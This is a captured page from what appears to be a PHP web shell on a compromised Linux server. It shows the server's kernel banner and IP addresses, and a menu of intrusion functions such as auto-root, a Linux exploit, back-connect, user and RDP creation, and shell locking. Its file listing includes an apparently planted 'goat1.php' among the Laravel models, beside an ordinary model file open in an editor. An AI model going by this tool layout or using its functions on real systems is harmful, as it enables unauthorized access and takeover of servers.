Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo2.com /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
Brand.php
1.93
KB
-rw-r--r--
Currency.php
1.75
KB
-rw-r--r--
Enquiry.php
2.34
KB
-rw-r--r--
Event.php
5.5
KB
-rw-r--r--
EventGoogleCalendar.php
1.8
KB
-rw-r--r--
EventSchedule.php
4.94
KB
-rw-r--r--
Faq.php
1.47
KB
-rw-r--r--
FrontCMSSetting.php
1.57
KB
-rw-r--r--
FrontTestimonial.php
2.85
KB
-rw-r--r--
GoogleCalendarIntegration.php
1.71
KB
-rw-r--r--
GoogleCalendarList.php
1.79
KB
-rw-r--r--
MainReason.php
1.99
KB
-rw-r--r--
PersonalExperience.php
1.3
KB
-rw-r--r--
PlanFeature.php
1.43
KB
-rw-r--r--
Schedule.php
2.38
KB
-rw-r--r--
Service.php
2.93
KB
-rw-r--r--
Setting.php
1.27
KB
-rw-r--r--
Subscribe.php
1.49
KB
-rw-r--r--
Subscription.php
3.13
KB
-rw-r--r--
SubscriptionPlan.php
3.42
KB
-rw-r--r--
Transaction.php
2.02
KB
-rw-r--r--
User.php
16.75
KB
-rw-r--r--
UserGoogleEventSchedule.php
2
KB
-rw-r--r--
UserSchedule.php
3.96
KB
-rw-r--r--
UserSetting.php
1.41
KB
-rw-r--r--
UserTransaction.php
4.1
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EventGoogleCalendar.php
<?php namespace App\Models; use Barryvdh\LaravelIdeHelper\Eloquent; use Illuminate\Database\Eloquent\Builder; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; use Illuminate\Database\Eloquent\Relations\BelongsTo; use Illuminate\Support\Carbon; /** * App\Models\EventGoogleCalendar * * @property-read GoogleCalendarList $googleCalendarList * * @method static Builder|EventGoogleCalendar newModelQuery() * @method static Builder|EventGoogleCalendar newQuery() * @method static Builder|EventGoogleCalendar query() * * @mixin Eloquent * * @property int $id * @property int $user_id * @property int $google_calendar_list_id * @property string $google_calendar_id * @property Carbon|null $created_at * @property Carbon|null $updated_at * * @method static Builder|EventGoogleCalendar whereCreatedAt($value) * @method static Builder|EventGoogleCalendar whereGoogleCalendarId($value) * @method static Builder|EventGoogleCalendar whereGoogleCalendarListId($value) * @method static Builder|EventGoogleCalendar whereId($value) * @method static Builder|EventGoogleCalendar whereUpdatedAt($value) * @method static Builder|EventGoogleCalendar whereUserId($value) */ class EventGoogleCalendar extends Model { use HasFactory; /** * @var string */ protected $table = 'event_google_calendars'; /** * @var string[] */ protected $fillable = [ 'user_id', 'google_calendar_list_id', 'google_calendar_id', ]; /** * @var string[] */ protected $casts = [ 'user_id' => 'integer', 'google_calendar_list_id' => 'integer', 'google_calendar_id' => 'string', ]; public function googleCalendarList(): BelongsTo { return $this->BelongsTo(GoogleCalendarList::class); } }
Close